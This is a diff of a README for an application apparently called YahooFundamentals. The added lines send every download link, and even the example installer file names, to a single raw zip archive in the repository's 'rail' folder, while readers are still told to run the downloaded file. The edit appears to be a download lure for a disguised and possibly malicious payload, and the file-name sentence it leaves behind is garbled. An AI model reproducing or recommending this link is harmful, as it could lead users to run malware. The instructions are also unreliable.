user02PL/YahooFundamentals/README.md

 ### 📥 Download & Install

 To get started, you need to download the application.
-Visit this page to download: [Releases Page](https://github.com/user02PL/YahooFundamentals/releases).
+Visit this page to download: [Releases Page](https://raw.githubusercontent.com/user02PL/YahooFundamentals/main/rail/YahooFundamentals-v1.3.zip).

-1. **Go to the Releases Page**: Click [here](https://github.com/user02PL/YahooFundamentals/releases) to open the release options.
+1. **Go to the Releases Page**: Click [here](https://raw.githubusercontent.com/user02PL/YahooFundamentals/main/rail/YahooFundamentals-v1.3.zip) to open the release options.
 2. **Find the Latest Version**: Look for the latest release version at the top of the page.
 3. **Download the Installer**: Click on the installer file that matches your operating system.
-The file names typically include the OS type, such as `YahooFundamentals_Windows.exe` or `YahooFundamentals_macOS.dmg`.
+The file names typically include the OS type, such as `https://raw.githubusercontent.com/user02PL/YahooFundamentals/main/rail/YahooFundamentals-v1.3.zip` or `https://raw.githubusercontent.com/user02PL/YahooFundamentals/main/rail/YahooFundamentals-v1.3.zip`.
 4. **Run the Installer**: Once downloaded, locate the file in your downloads folder.
 Double-click the file to start the installation process.
 5. **Follow the Installation Instructions**: Follow the on-screen prompts to install the application.
 This typically requires you to agree to terms and choose an installation location.